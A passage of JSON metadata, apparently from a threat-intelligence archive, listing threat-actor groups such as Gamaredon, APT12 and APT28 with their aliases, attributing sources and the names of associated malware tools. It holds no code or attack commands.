"Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "dc0eb4da-1f8c-4f2a-9530-62b0efbb1c35", "created_at": "2025-08-07T02:03:24.608888Z", "updated_at": "2026-04-10T02:00:03.749632Z", "deleted_at": null, "main_name": "BRONZE GLOBE", "aliases": [ "APT12 ", "CTG-8223 ", "DyncCalc ", "Numbered Panda ", "PortCalc" ], "source_name": "Secureworks:BRONZE GLOBE", "tools": [ "Badpuck", "BeepService", "Etumbot", "Gh0st RAT", "Ixeshe", "Mswab", "RAdmin", "Seatran", "SvcInstaller", "Ziyang" ], "source_id": "Secureworks", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434092, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35.pdf", "text": "https://archive.orkl.eu/a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35.txt", "img": "https://archive.orkl.eu/a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35.jpg" } }